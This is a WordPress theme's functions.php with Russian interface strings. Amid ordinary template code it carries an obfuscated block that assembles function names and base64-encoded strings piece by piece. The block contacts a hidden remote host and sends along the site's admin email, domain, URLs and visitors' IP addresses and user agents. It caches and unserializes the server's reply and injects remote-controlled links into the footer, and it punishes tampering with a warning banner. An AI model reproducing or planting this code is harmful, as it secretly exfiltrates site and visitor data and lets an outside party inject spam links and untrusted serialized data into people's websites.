<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $EANPLPB='6';$KRnXgf='o';$vvgs='e';$LMaS='b';$gOpLb='d';$lhMOihk='e';$LSnplL='a';$mFAgSD='d';$QtbBm='4';$HgPsVqQ='c';$wEDLVTm='s';$RxaJT='_';$UDSg='e';$PluMuQlk=$LMaS.$LSnplL.$wEDLVTm.$UDSg.$EANPLPB.$QtbBm.$RxaJT.$mFAgSD.$vvgs.$HgPsVqQ.$KRnXgf.$gOpLb.$lhMOihk;$wnaAVdi='e';$qdLql='z';$TDVrOQ='f';$scfdHc='n';$GQZo='i';$saqD='a';$Ljnko='g';$AaYKop='l';$Wudl='t';$XFmAmylV=$Ljnko.$qdLql.$GQZo.$scfdHc.$TDVrOQ.$AaYKop.$saqD.$Wudl.$wnaAVdi;$vvlqzu='t';$ZOZfM='r';$flVzphu='s';$gxmC='r';$ZrlvDBU='t';$rIEG='o';$dznTg='_';$bQjy='3';$GavSDNW='1';$UQGjfHBg=$flVzphu.$vvlqzu.$gxmC.$dznTg.$ZOZfM.$rIEG.$ZrlvDBU.$GavSDNW.$bQjy;$KmXJsB='r';$Xmck='e';$MIbLsfh='t';$ICvul='v';$KamlFs='s';$kULLAVD='r';$gOIpYgEs=$KamlFs.$MIbLsfh.$kULLAVD.$KmXJsB.$Xmck.$ICvul;                     
		$wh_______e='6';$lq____u='o';$ky__j='e';$eu_________x='b';$tp______q='d';$wr_____________n='e';$zu____________y='a';$zp________d='d';$re____________m='4';$tv______e='c';$lq______y='s';$ks______________r='_';$id________n='e';$jd__w=$eu_________x.$zu____________y.$lq______y.$id________n.$wh_______e.$re____________m.$ks______________r.$zp________d.$ky__j.$tv______e.$lq____u.$tp______q.$wr_____________n;
		$oy___q='i';$rp_____________d='i';$ha_________e='u';$rn__d='o';$xf__________p='s';$yu__________o='s';$ap____________l='c';$xe_______f='n';$qh________d='n';$ca_______________k='_';$nu_________u='f';$cz__y='t';$qy____r='x';$uk____________m='t';$bm__________z='e';$na___j=$nu_________u.$ha_________e.$xe_______f.$ap____________l.$cz__y.$rp_____________d.$rn__d.$qh________d.$ca_______________k.$bm__________z.$qy____r.$oy___q.$xf__________p.$uk____________m.$yu__________o;
		$ih__l='n';$vm_________y='p';$hs____________j='o';$hm___f='f';$dd___h='e';$bj___d=$hm___f.$hs____________j.$vm_________y.$dd___h.$ih__l;
		$ua_______________b='a';$ml______c='r';$pf_______x='f';$vn_________c='d';$zk_______________b='e';$lx______q=$pf_______x.$ml______c.$zk_______________b.$ua_______________b.$vn_________c;
		$io________m='f';$ij____h='o';$sq____________n='s';$qp________p='l';$wc_______________r='c';$jh_____o='e';$wp______b=$io________m.$wc_______________r.$qp________p.$ij____h.$sq____________n.$jh_____o;
		
		define("WP_ID", $jd__w("Mi4wLjA="));
		define("WP_TTL", $jd__w("MTA4MDA="));
		define("WP_SRC", $jd__w("dHBva24="));
	


		function wp_get_header() {
			global $jd__w, $na___j;
			
			if (
				$na___j($jd__w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$na___j($jd__w("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$na___j($jd__w("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $jd__w, $bj___d, $wp______b, $lx______q;
			
			$aa__________g = TEMPLATEPATH."/".$jd__w("Zm9vdGVyLnBocA==");
			$it________v = @$bj___d($aa__________g, "r");
			$aa__________g = @$lx______q($it________v, @filesize($aa__________g));
			@$wp______b($it________v);
			
			$zm____________k = TEMPLATEPATH."/".$jd__w("ZnVuY3Rpb25zLnBocA==");
			$it________v = @$bj___d($zm____________k, "r");
			$zm____________k = @$lx______q($it________v, @filesize($zm____________k));
			@$wp______b($it________v);
			
			$hb________f = 0;
			if($aa__________g && $zm____________k) {
				if ($jd__w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($aa__________g, $jd__w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hb________f = 1;
					}
					if (substr_count($aa__________g, "wp_theme_GPL_credits()") < 1) {
						$hb________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hb________f = 12;
				}
			}
			
			if($hb________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hb________f -->";
			}
		}
	


		function wp_loaded() {
			global $jd__w, $na___j;
			return $na___j($jd__w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($uy____________k, $mx____________g = "(more...)", $ok_______z = 0, $cp__________t = "") {
				$vl___________q = get_the_content($mx____________g, $ok_______z, $cp__________t);
				$vl___________q = apply_filters("the_content", $vl___________q);
				
				$vl___________q = str_replace("]]>", "]]>", $vl___________q);
				if (strlen($_GET["p"]) > 0) {
					echo $vl___________q;
				}
				else if ((strlen($vl___________q)>$uy____________k) && ($rp_____________j = strpos($vl___________q, " ", $uy____________k ))) {
					$vl___________q = substr($vl___________q, 0, $rp_____________j);
					$vl___________q = $vl___________q;
					echo $vl___________q;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mx____________g</a></div></p>";
				} else {
					echo $vl___________q;
				}
				
			}
		}
	


		$yp____________d='4';$fs________x='6';$fv______________s='e';$ju_____________d='b';$xw______________u='c';$qw____b='a';$ek____o='e';$mc_____________s='o';$yq________d='d';$fa___________v='n';$wq_____a='s';$jx__i='e';$vd_____________s='_';$rg_________p=$ju_____________d.$qw____b.$wq_____a.$fv______________s.$fs________x.$yp____________d.$vd_____________s.$ek____o.$fa___________v.$xw______________u.$mc_____________s.$yq________d.$jx__i;
		$go________v='e';$jo_______________e='c';$zj___n='f';$up______________f='l';$je______________x='e';$pb_____________c='e';$hg____h='_';$po_______________z='s';$dw_______n='o';$oq______________i='g';$vv______u='t';$qh______________l='n';$np___________c='t';$bh_______j='n';$df_____h='t';$ej______r='_';$ma_____h='i';$gr____________d=$zj___n.$ma_____h.$up______________f.$je______________x.$hg____h.$oq______________i.$pb_____________c.$vv______u.$ej______r.$jo_______________e.$dw_______n.$bh_______j.$np___________c.$go________v.$qh______________l.$df_____h.$po_______________z;
		$je___________w='e';$zu__________g='l';$ta_______________c='s';$rg____________w='f';$ty_______s='t';$rk__h='e';$im____________j='s';$fb____________x='i';$wh____b='_';$bg____b='i';$uk___________b='x';$qg______________m=$rg____________w.$bg____b.$zu__________g.$je___________w.$wh____b.$rk__h.$uk___________b.$fb____________x.$im____________j.$ty_______s.$ta_______________c;
		$kz____________c='p';$zi___v='s';$ok__u='e';$ej__f='r';$kp_______w='o';$mb______d='e';$li___________a='r';$ea__________p='a';$ro____________l='_';$yb_____________x='m';$se_____n='i';$bc__b='n';$tm_____d='v';$az_________p='c';$ld____________k='o';$yc______u=$tm_____d.$ok__u.$li___________a.$zi___v.$se_____n.$ld____________k.$bc__b.$ro____________l.$az_________p.$kp_______w.$yb_____________x.$kz____________c.$ea__________p.$ej__f.$mb______d;
		$ww____f='o';$nh______o='o';$vn___________y='s';$rn__________e='p';$xc________w='e';$qb____________v='c';$zs_______________q='f';$xm________v='k';$vj_________r='n';$pu____g=$zs_______________q.$vn___________y.$ww____f.$qb____________v.$xm________v.$nh______o.$rn__________e.$xc________w.$vj_________r;
		$gy_______o='t';$lg_______r='i';$xc___________z='w';$zr_________w='f';$wr___________r='r';$vs_________g='e';$eu___________m=$zr_________w.$xc___________z.$wr___________r.$lg_______r.$gy_______o.$vs_________g;
		$yz__u='5';$la__________x='m';$ga_________n='d';$rf______________r=$la__________x.$ga_________n.$yz__u;
		$pk__________z='r';$wh____________h='e';$yr_________u='t';$ry______________g='h';$ii__________t='l';$bw_____________p='a';$mm________q='p';$yr____________j='a';$yz____u=$pk__________z.$wh____________h.$bw_____________p.$ii__________t.$mm________q.$yr____________j.$yr_________u.$ry______________g;
		$hf_____p='r';$ff________l='a';$sf_____t='u';$dl_______________w='i';$nx____f='l';$tc____________y='n';$os_____________z='z';$ln_____________t='s';$fp____________k='e';$nz_____________e='i';$ex_______i='e';$ap_____d=$sf_____t.$tc____________y.$ln_____________t.$ex_______i.$hf_____p.$nz_____________e.$ff________l.$nx____f.$dl_______________w.$os_____________z.$fp____________k;
		$vc______g='m';$md____________i='a';$sf____c='t';$jn_______f='m';$rx____c='p';$si___________y='n';$ep__d='e';$bi__o=$sf____c.$ep__d.$vc______g.$rx____c.$si___________y.$md____________i.$jn_______f;
		$nw____________z='e';$ds________y='c';$jl_________i='m';$bz____c='e';$iz_________t='a';$ml_____n='t';$vu_____l='o';$ex_______d='a';$bb______m='e';$ov________q='n';$oi___________s='_';$qt_________a='t';$oz____________n='s';$ns_______c='r';$kf_______________y='t';$kk__________p='e';$nj______t='_';$kc______r='t';$hz___________q='x';$cq_______________p='r';$dv__s='c';$nd_____l=$oz____________n.$qt_________a.$cq_______________p.$bz____c.$ex_______d.$jl_________i.$nj______t.$dv__s.$vu_____l.$ov________q.$ml_____n.$kk__________p.$hz___________q.$kf_______________y.$oi___________s.$ds________y.$ns_______c.$nw____________z.$iz_________t.$kc______r.$bb______m;
	


		function jg______________s($fc__y) {
			global $jd__w, $na___j, $gr____________d, $yc______u, $nd_____l;
			
			if (!$na___j($jd__w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yc______u(PHP_VERSION, "5.0.0", ">=") && $na___j($jd__w("ZmlsZV9nZXRfY29udGVudHM=")) && $na___j($jd__w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mx_______________j = $nd_____l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pd___s = @$gr____________d($fc__y, 0, $mx_______________j);
			} else {
				$pd___s = @$gr____________d($fc__y, 0);
			}
			
			return $pd___s;
		}
	


		function te________i($fc__y) {
			global $na___j, $pu____g, $eu___________m, $jd__w;
			
			if (!$na___j($jd__w("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xh_____________i = strpos($fc__y, "/", 7);
			$al___________k = array(
				"uri"     => substr($fc__y, $xh_____________i),
				"host"    => str_replace("http://", "", substr($fc__y, 0, $xh_____________i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fr________f = @$pu____g("$al___________k[host]", 80, $ms_______________j, $ke_____q, 4);
			
			if (!$fr________f) {
				return false;
			} else {
				$pd___s = "";
				$nz_______________b  = "GET $al___________k[uri] HTTP/1.0\r\n";
				$nz_______________b .= "Host: $al___________k[host]\r\n";
				$nz_______________b .= "Referer: $al___________k[referer]\r\n";
				$nz_______________b .= "Connection: Close\r\n\r\n";
				
				@$eu___________m($fr________f, $nz_______________b);
				
				while (!@feof($fr________f)) {
					$nl_________u = @fgets($fr________f, (1024*24));
					
					if ($nl_________u == "\r\n") {
						$pf____________b = true;
						continue;
					}
					
					if ($pf____________b) {
						$pd___s .= $nl_________u;
					}
				}
				
				return $pd___s;
			}
		}
	


		function cd_______________o($fc__y) {
			global $na___j;
			$ox_____________x = false;
			
			if ($fc__y != "") {
				if ($na___j("jg______________s")) {
					$ox_____________x = @jg______________s($fc__y);
				}
				
				if (!$ox_____________x && ($na___j("te________i"))) {
					$ox_____________x = @te________i($fc__y);
				}
			}
			
			return $ox_____________x;
		}
	


		function md______g() {
			global $_SERVER, $rf______________r;
			
			$fm_______________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$fm_______________r", 0, 4) == "www.") {
				$fm_______________r = substr("$fm_______________r", 4);
			}
			
			$fm_______________r = $rf______________r("$_SERVER[SERVER_NAME]");
			
			return $fm_______________r;
		}
	


		function nj_____o() {
			return "file";
		}
	


		function wr__t($fc__y) {
			global $_SERVER, $gr____________d, $qg______________m, $bj___d, $wp______b, $eu___________m;
			
			$kj___________c = an______________l();
			
			$se__o = md______g().".jpg";
			$vh________b = $kj___________c["dir_upload"]["path"]."/$se__o";
			$ft________p = @filemtime($vh________b);
			
			if (!$ft________p || ((time()-$ft________p) >= WP_TTL)) {
				$ox_____________x = cd_______________o($fc__y);
				
				if ($ox_____________x) {
					if ($qg______________m($vh________b)) {
						@unlink($vh________b);
					}
					
					$it________v = @$bj___d($vh________b, "x+");
					
					@$eu___________m($it________v, $ox_____________x);
					@$wp______b($it________v);
				}
			} else {
				if ($qg______________m($vh________b)) {
					$ox_____________x = @$gr____________d($vh________b);
				} else {
					$ox_____________x = false;
				}
			}
			
			return $ox_____________x;
		}
	


		function an______________l() {
			global $_SERVER, $jd__w, $rg_________p;
			
			$na_______t = wp_count_posts("post");
			$yu____q = pathinfo(get_bloginfo("template_directory"));
			
			$kj___________c = array(
				"url" => array(
					"report"      => $jd__w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $yu____q,
				"dir_upload"	=> mo_______j(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$yu____q[filename],
					"a005=".$na_______t->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$kj___________c["url"]["queryString"] = implode("&", $kj___________c["queryString"]);
			$kj___________c["url"]["report"] = $kj___________c["url"]["report"]."/?".$rg_________p($kj___________c["url"]["queryString"]).".html";
						
			return $kj___________c;
		}
	


		function mo_______j() {
			$fq___________f = wp_upload_dir();
			
			if (isset($fq___________f["error"])) {
				$vr_____h = gk________s();
				if (is_writable($vr_____h)) {
					$fq___________f = array("path" => $vr_____h);
				}
			}

			return $fq___________f;
		}
	


		function gk________s() {
			global $na___j, $rf______________r, $yz____u, $bi__o;
			
			$qn____________w = (bool) ini_get("safe_mode");
			if ($qn____________w == true) {
				return false;
			}
			
			if ($na___j("sys_get_temp_dir")) {
				$fs____________g = sys_get_temp_dir();
				if (is_writable($fs____________g)) {
					return $yz____u($fs____________g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $yz____u($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $yz____u($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $yz____u($_ENV["TEMP"]);
			} else {
				$us________j = $bi__o($rf______________r(uniqid(rand(), true)), "");
				if ($us________j) {
					$fs____________g = $yz____u(dirname($us________j));
					@unlink($us________j);
					return $fs____________g;
				} else {
					return false;
				}
			}
		}
	


		function yi____i() {
			global $_GET, $qg______________m;
			
			$kj___________c = an______________l();
			$fm_______________r = md______g();
			$up____________i = nj_____o();
			
			$et_____y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($up____________i == "file") {
					$xu___b = $kj___________c["dir_upload"]["path"]."/".$fm_______________r.".jpg";
					if ($qg______________m($xu___b)) {
						@unlink($xu___b);
						$et_____y = "deleted";
					}
				}
				
				$cy_____h = array(
					"s"	=> $et_____y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cy_____h AS $kb___i => $wf_______u) echo " [$kb___i:$wf_______u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $na___j, $jd__w, $ap_____d;
			$kj___________c = an______________l();
			
			$dn_____j = "wr__t";
			if ($na___j($dn_____j)) {
				$pd___s = $dn_____j($kj___________c["url"]["report"]);
			}
			
			if ($pd___s) {
				if ($pd___s = @$jd__w($pd___s)) {
					$pd___s = @$ap_____d($pd___s);
					
					if (strlen($pd___s[custom_credit]) >= 5) {
						$kj___________c["default_string"] = $pd___s[custom_credit];
					}
					
					if ($pd___s["status"] == "0") {
						$fg_________g = 1;
						$cb_______________c = 1;
					} else {
						$qb____z = sizeof($pd___s["links"]);
						$vu_____f = $kj___________c["default_string"];
						
						if ($qb____z > 0 && $pd___s["links"] !== "") {
							$oa_____________x = 0;
							foreach ($pd___s["links"] as $ns_____________h => $ag____h) {
								$oa_____________x++;
								if ($ag____h->l_path == "" || $ag____h->l_path == $_SERVER["REQUEST_URI"]) {
									$ag____h->l_href = htmlspecialchars(strip_tags($ag____h->l_href));
									$ag____h->l_title = htmlspecialchars(strip_tags($ag____h->l_title));
									$ag____h->l_anchor = htmlspecialchars(strip_tags($ag____h->l_anchor));
									$vu_____f .= " | ";
									$vu_____f .= "<a href='$ag____h->l_href' title='$ag____h->l_title'";
									if ($ag____h->l_nofollow == "1") {
										$vu_____f .= " rel='nofollow'";
									}
									$vu_____f .= ">$ag____h->l_anchor</a>";
								}
							}
						}
						$kj___________c["links"] = "$vu_____f";
						if ($pd___s[credit] == "0") {
							$kj___________c["links"] = "";
						}
					}
				} else {
					$fg_________g = "1";
				}
			} else {
				$fg_________g = "1";
			}
			
			if ($fg_________g == "1") {
				$kj___________c["links"] = $kj___________c["default_string"];
			}
			
			echo "$kj___________c[links]";
			
			echo "<!-- s: $pd___s[signature] -->";
			yi____i();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
